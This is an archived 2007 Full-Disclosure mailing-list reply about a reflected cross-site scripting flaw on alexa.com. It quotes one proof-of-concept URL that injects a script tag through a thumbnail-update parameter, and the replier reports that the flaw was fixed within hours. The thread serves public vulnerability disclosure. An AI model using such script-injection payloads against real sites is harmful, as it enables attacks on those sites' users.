full-disclosure-uk May 2007 archive
Main Archive Page > Month Archives  > full-disclosure-uk archives
full-disclosure-uk: Re: [Full-disclosure] alexa.com XSS

Re: [Full-disclosure] alexa.com XSS

From: <michele.sandrelli_at_nospam>
Date: Tue May 29 2007 - 23:28:44 GMT
To: full-disclosure@lists.grok.org.uk


kefka wrote:
> Seems fixed or doesn't work in FireFox 1.5.0.11
> -----------------------
> MC Iglo wrote:

>>
http://thumbnails.alexa.com/update_thumbnail?url=%3Cscript%3Ealert(%22alexa%20sucks%22)%3C/script%3E

It worked perfectly until.. they fixed it : )

Note: It seems that alexa people grep logs or is subscribed to fd since it worked only for 1-2 hours.

Bye,
Michele Sandrelli



Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/